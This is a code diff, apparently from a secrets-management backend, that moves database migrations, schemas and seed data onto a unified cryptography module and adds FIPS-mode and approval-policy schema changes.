+        iv: symmetricKeyIV,
+        tag: symmetricKeyTag,
+        keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+      });
 
     const decryptedTokenReviewerJwt =
       // eslint-disable-next-line @typescript-eslint/ban-ts-comment
       // @ts-ignore This will be removed in next cycle so ignore the ts missing error
       el.encryptedTokenReviewerJwt && el.tokenReviewerJwtIV && el.tokenReviewerJwtTag
-        ? decryptSymmetric({
+        ? crypto.encryption().symmetric().decrypt({
             key,
+            keySize: SymmetricKeySize.Bits256,
             // eslint-disable-next-line @typescript-eslint/ban-ts-comment
             // @ts-ignore This will be removed in next cycle so ignore the ts missing error
             iv: el.tokenReviewerJwtIV,
@@ -128,8 +135,9 @@ const reencryptIdentityK8sAuth = async (knex: Knex) => {
       // eslint-disable-next-line @typescript-eslint/ban-ts-comment
       // @ts-ignore This will be removed in next cycle so ignore the ts missing error
       el.encryptedCaCert && el.caCertIV && el.caCertTag
-        ? decryptSymmetric({
+        ? crypto.encryption().symmetric().decrypt({
             key,
+            keySize: SymmetricKeySize.Bits256,
             // eslint-disable-next-line @typescript-eslint/ban-ts-comment
             // @ts-ignore This will be removed in next cycle so ignore the ts missing error
             iv: el.caCertIV,

backend/src/db/migrations/20250210101842_identity-oidc-auth-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName, TOrgBots } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -34,7 +35,9 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -71,19 +74,24 @@ const reencryptIdentityOidcAuth = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedCertificate =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCaCert && el.caCertIV && el.caCertTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.caCertIV,

backend/src/db/migrations/20250210101845_directory-config-to-kms.ts

@@ -1,10 +1,11 @@
 import { Knex } from "knex";
 
 import { inMemoryKeyStore } from "@app/keystore/memory";
-import { decryptSymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { SecretKeyEncoding, TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -27,7 +28,8 @@ const reencryptSamlConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -58,19 +60,24 @@ const reencryptSamlConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedEntryPoint =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedEntryPoint && el.entryPointIV && el.entryPointTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.entryPointIV,
@@ -87,8 +94,9 @@ const reencryptSamlConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedIssuer && el.issuerIV && el.issuerTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.issuerIV,
@@ -105,8 +113,9 @@ const reencryptSamlConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCert && el.certIV && el.certTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.certIV,
@@ -185,7 +194,8 @@ const reencryptLdapConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -216,19 +226,24 @@ const reencryptLdapConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedBindDN =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedBindDN && el.bindDNIV && el.bindDNTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.bindDNIV,
@@ -245,8 +260,9 @@ const reencryptLdapConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedBindPass && el.bindPassIV && el.bindPassTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.bindPassIV,
@@ -263,8 +279,9 @@ const reencryptLdapConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedCACert && el.caCertIV && el.caCertTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.caCertIV,
@@ -337,7 +354,8 @@ const reencryptOidcConfig = async (knex: Knex) => {
   }
 
   initLogger();
-  const envConfig = getMigrationEnvConfig();
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
   const keyStore = inMemoryKeyStore();
   const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
   const orgEncryptionRingBuffer =
@@ -368,19 +386,24 @@ const reencryptOidcConfig = async (knex: Knex) => {
           );
           orgEncryptionRingBuffer.push(el.orgId, orgKmsService);
         }
-        const key = infisicalSymmetricDecrypt({
-          ciphertext: encryptedSymmetricKey,
-          iv: symmetricKeyIV,
-          tag: symmetricKeyTag,
-          keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
-        });
+
+        const key = crypto
+          .encryption()
+          .symmetric()
+          .decryptWithRootEncryptionKey({
+            ciphertext: encryptedSymmetricKey,
+            iv: symmetricKeyIV,
+            tag: symmetricKeyTag,
+            keyEncoding: symmetricKeyKeyEncoding as SecretKeyEncoding
+          });
 
         const decryptedClientId =
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedClientId && el.clientIdIV && el.clientIdTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.clientIdIV,
@@ -397,8 +420,9 @@ const reencryptOidcConfig = async (knex: Knex) => {
           // eslint-disable-next-line @typescript-eslint/ban-ts-comment
           // @ts-ignore This will be removed in next cycle so ignore the ts missing error
           el.encryptedClientSecret && el.clientSecretIV && el.clientSecretTag
-            ? decryptSymmetric({
+            ? crypto.encryption().symmetric().decrypt({
                 key,
+                keySize: SymmetricKeySize.Bits256,
                 // eslint-disable-next-line @typescript-eslint/ban-ts-comment
                 // @ts-ignore This will be removed in next cycle so ignore the ts missing error
                 iv: el.clientSecretIV,

backend/src/db/migrations/20250513081738_remove-gateway-project-link.ts

@@ -4,6 +4,7 @@ import { inMemoryKeyStore } from "@app/keystore/memory";
 import { selectAllTableCols } from "@app/lib/knex";
 import { initLogger } from "@app/lib/logger";
 import { KmsDataKey } from "@app/services/kms/kms-types";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 import { TableName } from "../schemas";
 import { getMigrationEnvConfig } from "./utils/env-config";
@@ -39,7 +40,8 @@ export async function up(knex: Knex): Promise<void> {
       );
 
     initLogger();
-    const envConfig = getMigrationEnvConfig();
+    const superAdminDAL = superAdminDALFactory(knex);
+    const envConfig = await getMigrationEnvConfig(superAdminDAL);
     const keyStore = inMemoryKeyStore();
     const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
 

backend/src/db/migrations/20250705074703_fips-mode.ts

@@ -0,0 +1,23 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
+
+  if (!hasFipsModeColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
+      table.boolean("fipsEnabled").notNullable().defaultTo(false);
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const hasFipsModeColumn = await knex.schema.hasColumn(TableName.SuperAdmin, "fipsEnabled");
+
+  if (hasFipsModeColumn) {
+    await knex.schema.alterTable(TableName.SuperAdmin, (table) => {
+      table.dropColumn("fipsEnabled");
+    });
+  }
+}

backend/src/db/migrations/20250710115149_required-path-on-approval-policies.ts

@@ -0,0 +1,55 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const existingSecretApprovalPolicies = await knex(TableName.SecretApprovalPolicy)
+    .whereNull("secretPath")
+    .orWhere("secretPath", "");
+
+  const existingAccessApprovalPolicies = await knex(TableName.AccessApprovalPolicy)
+    .whereNull("secretPath")
+    .orWhere("secretPath", "");
+
+  // update all the secret approval policies secretPath to be "/**"
+  if (existingSecretApprovalPolicies.length) {
+    await knex(TableName.SecretApprovalPolicy)
+      .whereIn(
+        "id",
+        existingSecretApprovalPolicies.map((el) => el.id)
+      )
+      .update({
+        secretPath: "/**"
+      });
+  }
+
+  // update all the access approval policies secretPath to be "/**"
+  if (existingAccessApprovalPolicies.length) {
+    await knex(TableName.AccessApprovalPolicy)
+      .whereIn(
+        "id",
+        existingAccessApprovalPolicies.map((el) => el.id)
+      )
+      .update({
+        secretPath: "/**"
+      });
+  }
+
+  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
+    table.string("secretPath").notNullable().alter();
+  });
+
+  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
+    table.string("secretPath").notNullable().alter();
+  });
+}
+
+export async function down(knex: Knex): Promise<void> {
+  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (table) => {
+    table.string("secretPath").nullable().alter();
+  });
+
+  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (table) => {
+    table.string("secretPath").nullable().alter();
+  });
+}

backend/src/db/migrations/20250710153448_adjust-approval-request-user-cols.ts

@@ -0,0 +1,35 @@
+import { Knex } from "knex";
+
+import { TableName } from "@app/db/schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasCommitterCol = await knex.schema.hasColumn(TableName.SecretApprovalRequest, "committerUserId");
+
+  if (hasCommitterCol) {
+    await knex.schema.alterTable(TableName.SecretApprovalRequest, (tb) => {
+      tb.uuid("committerUserId").nullable().alter();
+    });
+  }
+
+  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
+
+  if (hasRequesterCol) {
+    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
+      tb.dropForeign("requestedByUserId");
+      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("CASCADE");
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  // can't undo committer nullable
+
+  const hasRequesterCol = await knex.schema.hasColumn(TableName.AccessApprovalRequest, "requestedByUserId");
+
+  if (hasRequesterCol) {
+    await knex.schema.alterTable(TableName.AccessApprovalRequest, (tb) => {
+      tb.dropForeign("requestedByUserId");
+      tb.foreign("requestedByUserId").references("id").inTable(TableName.Users).onDelete("SET NULL");
+    });
+  }
+}

backend/src/db/migrations/20250711005900_github-app-connection-to-environments.ts

@@ -0,0 +1,68 @@
+import { Knex } from "knex";
+
+import { inMemoryKeyStore } from "@app/keystore/memory";
+import { selectAllTableCols } from "@app/lib/knex";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
+
+import { TableName } from "../schemas";
+import { getMigrationEnvConfig } from "./utils/env-config";
+import { getMigrationEncryptionServices } from "./utils/services";
+
+export async function up(knex: Knex) {
+  const existingSuperAdminsWithGithubConnection = await knex(TableName.SuperAdmin)
+    .select(selectAllTableCols(TableName.SuperAdmin))
+    .whereNotNull(`${TableName.SuperAdmin}.encryptedGitHubAppConnectionClientId`);
+
+  const superAdminDAL = superAdminDALFactory(knex);
+  const envConfig = await getMigrationEnvConfig(superAdminDAL);
+  const keyStore = inMemoryKeyStore();
+  const { kmsService } = await getMigrationEncryptionServices({ envConfig, keyStore, db: knex });
+
+  const decryptor = kmsService.decryptWithRootKey();
+  const encryptor = kmsService.encryptWithRootKey();
+
+  const tasks = existingSuperAdminsWithGithubConnection.map(async (admin) => {
+    const overrides = (
+      admin.encryptedEnvOverrides ? JSON.parse(decryptor(Buffer.from(admin.encryptedEnvOverrides)).toString()) : {}
+    ) as Record<string, string>;
+
+    if (admin.encryptedGitHubAppConnectionClientId) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_ID = decryptor(
+        admin.encryptedGitHubAppConnectionClientId
+      ).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionClientSecret) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_CLIENT_SECRET = decryptor(
+        admin.encryptedGitHubAppConnectionClientSecret
+      ).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionPrivateKey) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY = decryptor(
+        admin.encryptedGitHubAppConnectionPrivateKey
+      ).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionSlug) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_SLUG = decryptor(admin.encryptedGitHubAppConnectionSlug).toString();
+    }
+
+    if (admin.encryptedGitHubAppConnectionId) {
+      overrides.INF_APP_CONNECTION_GITHUB_APP_ID = decryptor(admin.encryptedGitHubAppConnectionId).toString();
+    }
+
+    const encryptedEnvOverrides = encryptor(Buffer.from(JSON.stringify(overrides)));
+
+    await knex(TableName.SuperAdmin).where({ id: admin.id }).update({
+      encryptedEnvOverrides
+    });
+  });
+
+  await Promise.all(tasks);
+}
+
+export async function down() {
+  // No down migration needed as this migration is only for data transformation
+  // and does not change the schema.
+}

backend/src/db/migrations/20250717195959_gatewayid-for-app-conn.ts

@@ -0,0 +1,19 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  if (!(await knex.schema.hasColumn(TableName.AppConnection, "gatewayId"))) {
+    await knex.schema.alterTable(TableName.AppConnection, (t) => {
+      t.uuid("gatewayId").nullable();
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  if (await knex.schema.hasColumn(TableName.AppConnection, "gatewayId")) {
+    await knex.schema.alterTable(TableName.AppConnection, (t) => {
+      t.dropColumn("gatewayId");
+    });
+  }
+}

backend/src/db/migrations/20250721101756_bump-aws-arn-field-size.ts

@@ -0,0 +1,21 @@
+import { Knex } from "knex";
+
+import { TableName } from "../schemas";
+
+export async function up(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
+  if (hasColumn) {
+    await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
+      t.string("allowedPrincipalArns", 4096).notNullable().alter();
+    });
+  }
+}
+
+export async function down(knex: Knex): Promise<void> {
+  const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
+  if (hasColumn) {
+    await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
+      t.string("allowedPrincipalArns", 2048).notNullable().alter();
+    });
+  }
+}

backend/src/db/migrations/utils/env-config.ts

@@ -1,6 +1,8 @@
 import { z } from "zod";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { zpStr } from "@app/lib/zod";
+import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 const envSchema = z
   .object({
@@ -35,7 +37,7 @@ const envSchema = z
 
 export type TMigrationEnvConfig = z.infer<typeof envSchema>;
 
-export const getMigrationEnvConfig = () => {
+export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory) => {
   const parsedEnv = envSchema.safeParse(process.env);
   if (!parsedEnv.success) {
     // eslint-disable-next-line no-console
@@ -49,5 +51,24 @@ export const getMigrationEnvConfig = () => {
     process.exit(-1);
   }
 
-  return Object.freeze(parsedEnv.data);
+  let envCfg = Object.freeze(parsedEnv.data);
+
+  const fipsEnabled = await crypto.initialize(superAdminDAL);
+
+  // Fix for 128-bit entropy encryption key expansion issue:
+  // In FIPS it is not ideal to expand a 128-bit key into 256-bit. We solved this issue in the past by creating the ROOT_ENCRYPTION_KEY.
+  // If FIPS mode is enabled, we set the value of ROOT_ENCRYPTION_KEY to the value of ENCRYPTION_KEY.
+  // ROOT_ENCRYPTION_KEY is expected to be a 256-bit base64-encoded key, unlike the 32-byte key of ENCRYPTION_KEY.
+  // When ROOT_ENCRYPTION_KEY is set, our cryptography will always use a 256-bit entropy encryption key. So for the sake of FIPS we should just roll over the value of ENCRYPTION_KEY to ROOT_ENCRYPTION_KEY.
+  if (fipsEnabled) {
+    const newEnvCfg = {
+      ...envCfg,
+      ROOT_ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY
+    };
+    delete newEnvCfg.ENCRYPTION_KEY;
+
+    envCfg = Object.freeze(newEnvCfg);
+  }
+
+  return envCfg;
 };

backend/src/db/schemas/access-approval-policies-approvers.ts

@@ -14,8 +14,8 @@ export const AccessApprovalPoliciesApproversSchema = z.object({
   updatedAt: z.date(),
   approverUserId: z.string().uuid().nullable().optional(),
   approverGroupId: z.string().uuid().nullable().optional(),
-  sequence: z.number().default(0).nullable().optional(),
-  approvalsRequired: z.number().default(1).nullable().optional()
+  sequence: z.number().default(1).nullable().optional(),
+  approvalsRequired: z.number().nullable().optional()
 });
 
 export type TAccessApprovalPoliciesApprovers = z.infer<typeof AccessApprovalPoliciesApproversSchema>;

backend/src/db/schemas/access-approval-policies.ts

@@ -11,7 +11,7 @@ export const AccessApprovalPoliciesSchema = z.object({
   id: z.string().uuid(),
   name: z.string(),
   approvals: z.number().default(1),
-  secretPath: z.string().nullable().optional(),
+  secretPath: z.string(),
   envId: z.string().uuid(),
   createdAt: z.date(),
   updatedAt: z.date(),

backend/src/db/schemas/app-connections.ts

@@ -20,7 +20,8 @@ export const AppConnectionsSchema = z.object({
   orgId: z.string().uuid(),
   createdAt: z.date(),
   updatedAt: z.date(),
-  isPlatformManagedCredentials: z.boolean().default(false).nullable().optional()
+  isPlatformManagedCredentials: z.boolean().default(false).nullable().optional(),
+  gatewayId: z.string().uuid().nullable().optional()
 });
 
 export type TAppConnections = z.infer<typeof AppConnectionsSchema>;

backend/src/db/schemas/certificate-authorities.ts

@@ -12,8 +12,8 @@ export const CertificateAuthoritiesSchema = z.object({
   createdAt: z.date(),
   updatedAt: z.date(),
   projectId: z.string(),
-  enableDirectIssuance: z.boolean().default(true),
   status: z.string(),
+  enableDirectIssuance: z.boolean().default(true),
   name: z.string()
 });
 

backend/src/db/schemas/certificates.ts

@@ -25,8 +25,8 @@ export const CertificatesSchema = z.object({
   certificateTemplateId: z.string().uuid().nullable().optional(),
   keyUsages: z.string().array().nullable().optional(),
   extendedKeyUsages: z.string().array().nullable().optional(),
-  pkiSubscriberId: z.string().uuid().nullable().optional(),
-  projectId: z.string()
+  projectId: z.string(),
+  pkiSubscriberId: z.string().uuid().nullable().optional()
 });
 
 export type TCertificates = z.infer<typeof CertificatesSchema>;

backend/src/db/schemas/secret-approval-policies.ts

@@ -10,7 +10,7 @@ import { TImmutableDBKeys } from "./models";
 export const SecretApprovalPoliciesSchema = z.object({
   id: z.string().uuid(),
   name: z.string(),
-  secretPath: z.string().nullable().optional(),
+  secretPath: z.string(),
   approvals: z.number().default(1),
   envId: z.string().uuid(),
   createdAt: z.date(),

backend/src/db/schemas/secret-approval-requests.ts

@@ -18,7 +18,7 @@ export const SecretApprovalRequestsSchema = z.object({
   createdAt: z.date(),
   updatedAt: z.date(),
   isReplicated: z.boolean().nullable().optional(),
-  committerUserId: z.string().uuid(),
+  committerUserId: z.string().uuid().nullable().optional(),
   statusChangedByUserId: z.string().uuid().nullable().optional(),
   bypassReason: z.string().nullable().optional()
 });

backend/src/db/schemas/super-admin.ts

@@ -35,7 +35,8 @@ export const SuperAdminSchema = z.object({
   encryptedGitHubAppConnectionSlug: zodBuffer.nullable().optional(),
   encryptedGitHubAppConnectionId: zodBuffer.nullable().optional(),
   encryptedGitHubAppConnectionPrivateKey: zodBuffer.nullable().optional(),
-  encryptedEnvOverrides: zodBuffer.nullable().optional()
+  encryptedEnvOverrides: zodBuffer.nullable().optional(),
+  fipsEnabled: z.boolean().default(false)
 });
 
 export type TSuperAdmin = z.infer<typeof SuperAdminSchema>;

backend/src/db/seed-data.ts

@@ -1,18 +1,8 @@
 /* eslint-disable import/no-mutable-exports */
-import crypto from "node:crypto";
-
 import argon2, { argon2id } from "argon2";
 import jsrp from "jsrp";
-import nacl from "tweetnacl";
-import { encodeBase64 } from "tweetnacl-util";
 
-import {
-  decryptAsymmetric,
-  // decryptAsymmetric,
-  decryptSymmetric128BitHexKeyUTF8,
-  encryptAsymmetric,
-  encryptSymmetric128BitHexKeyUTF8
-} from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 
 import { TSecrets, TUserEncryptionKeys } from "./schemas";
 
@@ -62,11 +52,7 @@ export const seedData1 = {
 };
 
 export const generateUserSrpKeys = async (password: string) => {
-  const pair = nacl.box.keyPair();
-  const secretKeyUint8Array = pair.secretKey;
-  const publicKeyUint8Array = pair.publicKey;
-  const privateKey = encodeBase64(secretKeyUint8Array);
-  const publicKey = encodeBase64(publicKeyUint8Array);
+  const { publicKey, privateKey } = await crypto.encryption().asymmetric().generateKeyPair();
 
   // eslint-disable-next-line
   const client = new jsrp.client();
@@ -98,7 +84,11 @@ export const generateUserSrpKeys = async (password: string) => {
     ciphertext: encryptedPrivateKey,
     iv: encryptedPrivateKeyIV,
     tag: encryptedPrivateKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(privateKey, key);
+  } = crypto.encryption().symmetric().encrypt({
+    plaintext: privateKey,
+    key,
+    keySize: SymmetricKeySize.Bits128
+  });
 
   // create the protected key by encrypting the symmetric key
   // [key] with the derived key
@@ -106,7 +96,10 @@ export const generateUserSrpKeys = async (password: string) => {
     ciphertext: protectedKey,
     iv: protectedKeyIV,
     tag: protectedKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(key.toString("hex"), derivedKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({ plaintext: key.toString("hex"), key: derivedKey, keySize: SymmetricKeySize.Bits128 });
 
   return {
     protectedKey,
@@ -133,30 +126,38 @@ export const getUserPrivateKey = async (password: string, user: TUserEncryptionK
   });
   if (!derivedKey) throw new Error("Failed to derive key from password");
 
-  const key = decryptSymmetric128BitHexKeyUTF8({
-    ciphertext: user.protectedKey as string,
-    iv: user.protectedKeyIV as string,
-    tag: user.protectedKeyTag as string,
-    key: derivedKey
-  });
+  const key = crypto
+    .encryption()
+    .symmetric()
+    .decrypt({
+      ciphertext: user.protectedKey as string,
+      iv: user.protectedKeyIV as string,
+      tag: user.protectedKeyTag as string,
+      key: derivedKey,
+      keySize: SymmetricKeySize.Bits128
+    });
 
-  const privateKey = decryptSymmetric128BitHexKeyUTF8({
-    ciphertext: user.encryptedPrivateKey,
-    iv: user.iv,
-    tag: user.tag,
-    key: Buffer.from(key, "hex")
-  });
+  const privateKey = crypto
+    .encryption()
+    .symmetric()
+    .decrypt({
+      ciphertext: user.encryptedPrivateKey,
+      iv: user.iv,
+      tag: user.tag,
+      key: Buffer.from(key, "hex"),
+      keySize: SymmetricKeySize.Bits128
+    });
   return privateKey;
 };
 
 export const buildUserProjectKey = (privateKey: string, publickey: string) => {
   const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { nonce, ciphertext } = encryptAsymmetric(randomBytes, publickey, privateKey);
+  const { nonce, ciphertext } = crypto.encryption().asymmetric().encrypt(randomBytes, publickey, privateKey);
   return { nonce, ciphertext };
 };
 
 export const getUserProjectKey = async (privateKey: string, ciphertext: string, nonce: string, publicKey: string) => {
-  return decryptAsymmetric({
+  return crypto.encryption().asymmetric().decrypt({
     ciphertext,
     nonce,
     publicKey,
@@ -170,21 +171,39 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
     ciphertext: secretKeyCiphertext,
     iv: secretKeyIV,
     tag: secretKeyTag
-  } = encryptSymmetric128BitHexKeyUTF8(key, encKey);
+  } = crypto.encryption().symmetric().encrypt({
+    plaintext: key,
+    key: encKey,
+    keySize: SymmetricKeySize.Bits128
+  });
 
   // encrypt value
   const {
     ciphertext: secretValueCiphertext,
     iv: secretValueIV,
     tag: secretValueTag
-  } = encryptSymmetric128BitHexKeyUTF8(value ?? "", encKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: value ?? "",
+      key: encKey,
+      keySize: SymmetricKeySize.Bits128
+    });
 
   // encrypt comment
   const {
     ciphertext: secretCommentCiphertext,
     iv: secretCommentIV,
     tag: secretCommentTag
-  } = encryptSymmetric128BitHexKeyUTF8(comment ?? "", encKey);
+  } = crypto
+    .encryption()
+    .symmetric()
+    .encrypt({
+      plaintext: comment ?? "",
+      key: encKey,
+      keySize: SymmetricKeySize.Bits128
+    });
 
   return {
     secretKeyCiphertext,
